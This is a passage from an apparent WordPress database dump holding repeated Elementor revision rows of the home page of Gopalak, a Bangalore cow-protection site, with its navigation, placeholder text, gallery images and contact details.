src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:58','2022-10-12 07:17:58','',1373,'https://gopalak.in/?p=1670',0,'revision','',0),(1671,1,'2022-10-12 12:48:10','2022-10-12 07:18:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:48:10','2022-10-12 07:18:10','',1373,'https://gopalak.in/?p=1671',0,'revision','',0),(1672,1,'2022-10-12 12:48:10','2022-10-12 07:18:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:48:10','2022-10-12 07:18:10','',1373,'https://gopalak.in/?p=1672',0,'revision','',0),(1673,1,'2022-10-12 12:48:11','2022-10-12 07:18:11','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:48:11','2022-10-12 07:18:11','',1373,'https://gopalak.in/?p=1673',0,'revision','',0),(1674,1,'2022-10-12 12:49:06','2022-10-12 07:19:06','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading 